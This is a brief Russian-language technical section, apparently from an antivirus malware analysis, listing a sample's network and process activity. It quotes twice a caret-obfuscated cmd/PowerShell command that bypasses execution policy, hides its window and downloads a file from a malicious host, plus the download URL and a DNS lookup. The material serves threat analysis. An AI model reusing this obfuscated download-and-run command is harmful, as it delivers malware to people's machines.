Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOweR^S^h^E^ll^.E^Xe^ -^EX^e^CutIO^Np^oli^cY byPAsS -^nOpr^oFI^le -W^i^N^dOWS^T^yle ^H^i^Dden (NE^w-OB^j^E^cT S^YS^tem.NE^T.WEBcl^ienT).DOWNLOAd^FIL^E(^'http://www.zoerpole...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "pOweR^S^h^E^ll^.E^Xe^ -^EX^e^CutIO^Np^oli^cY byPAsS -^nOpr^oFI^le -W^i^N^dOWS^T^yle ^H^i^Dden (NE^w-OB^j^E^cT S^YS^tem.NE^T.WEBcl^ienT).DOWNLOAd^FIL^E(^'http://www.zoerpole...' (со скрытым окном)